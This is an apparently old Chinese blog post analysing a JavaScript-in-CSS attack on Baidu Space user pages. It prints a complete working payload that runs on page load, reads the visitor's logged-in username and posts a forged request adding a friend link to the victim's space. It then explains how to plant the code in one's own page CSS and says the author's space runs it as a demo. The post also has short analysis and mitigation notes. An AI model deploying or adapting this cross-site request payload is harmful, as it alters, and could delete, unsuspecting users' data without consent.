本文作者:Auc
本文原著:http://hi.baidu.com/haomm/
百度空間的發(fā)布,給很多國(guó)內(nèi)網(wǎng)民帶來了福音,帶來了中國(guó)space的希望,但與此同時(shí),百度空間的"CSS教程"泛濫至極,訪問量從高到低各層次都是在大肆宣傳自己復(fù)制的css代碼(不排除有個(gè)別原創(chuàng)),而真正拿hi.baidu.com作為自己space的,專業(yè)的博客者很少.百度空間似乎可以更名"百度css練手空間".
在眾多復(fù)制粘貼愛好者中,不乏有css鉆研者,憑著他們對(duì)css代碼的"天賦",寫出了一些別出心裁的代碼,讓初學(xué)者五體投地,很受css復(fù)制愛好者青睞,這部分css作者值得稱贊.但與此同時(shí)也出現(xiàn)了百度空間的網(wǎng)絡(luò)黑手,利用百度空間的功能,加入自己的代碼,而這些代碼又是惡意的,導(dǎo)致百度空間的用戶失去了使用空間的自由.
這是一個(gè)網(wǎng)友發(fā)來的短信求助,原文如下:
有個(gè)黑客用javascript把我的鏈接改了。。并威脅我如果刪除連接就刪除我的空間,最怕的就是這樣的人。。我想問您了解一下他能用同樣的手段篡改我頁面的其他信息嗎。。最好能告訴小弟對(duì)付這樣的人的辦法,我實(shí)在沒轍了,好郁悶。。謝謝。。
當(dāng)時(shí)筆者找到該"黑客"的空間,輕松發(fā)現(xiàn)其利用css代碼加入js代碼,然后又利用js代碼的功能,分析百度空間在提交數(shù)據(jù)時(shí)的參數(shù),構(gòu)造出來一個(gè)惡意的js代碼,功能是提交一個(gè)加入友情鏈接的請(qǐng)求到百度空間,導(dǎo)致訪問該網(wǎng)站的已登陸百度空間用戶在自己空間上自動(dòng)的加一個(gè)友情鏈接.
下邊是利用代碼:
javascript:document.body.onload = function(){
var req = null;
if(window.XMLHttpRequest) req = new XMLHttpRequest();
else if(window.ActiveXObject){
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for(var i=0;i<msxml.length;i++){try{req = new ActiveXObject(msxml[i]); break;}catch(e){}}
try{req.overrideMimeType('text/xml')}catch(e){}
}
req.open('get','.',false);
req.send();
var s=req.responseText;
p=s.indexOf('passport.baidu.com/?logout');
if(p>0)
{
p=s.indexOf('<strong>');
if(p>0)
{
p=s.indexOf('/',p);
p2=s.indexOf(String.fromCharCode(34),p);
var user=s.substring(p+1,p2);
var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 ';
var link='http://hi.baidu.com/haomm';
var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB';
var url='/'+user+'/commit';
var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
req.open('post',url,false);
req.send(data);
}
}
}
代碼分析:
上述代碼"+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc)",有些js知識(shí)的朋友不難看出,此段代碼用js取得訪問用戶user參數(shù),其中var name,var link,var desc這三個(gè)參數(shù)即是惡意構(gòu)造的友情鏈接的指定參數(shù),構(gòu)造提交一個(gè)增加友情鏈接的請(qǐng)求到百度服務(wù)器,導(dǎo)致執(zhí)行后結(jié)果用戶空間增加一惡意鏈接.
分析:
該方法危險(xiǎn)等級(jí):高級(jí).構(gòu)造相應(yīng)的js代碼可以刪除用戶空間的所有數(shù)據(jù).該漏洞目前未發(fā)現(xiàn)有惡意刪除的現(xiàn)象,但已足夠危險(xiǎn),請(qǐng)用戶小心.但此操作對(duì)用戶密碼沒有太大影響.
解決辦法:
由于攻擊者可能利用任何用戶名的百度空間提交增加,刪除,更改的鏈接,所以目前沒有完美解決辦法.
給已經(jīng)受害者解決辦法:刪除惡意鏈接,不再在登陸的情況下訪問其空間鏈接.
利用方法,演示及聲明:
本空間加入了該漏洞代碼的利用演示,使用方法:在自己空間css里面找到#header{},在里面加入上述代碼即可.形式如:#header{height:200px;background:url("上文js代碼");}請(qǐng)小心使用.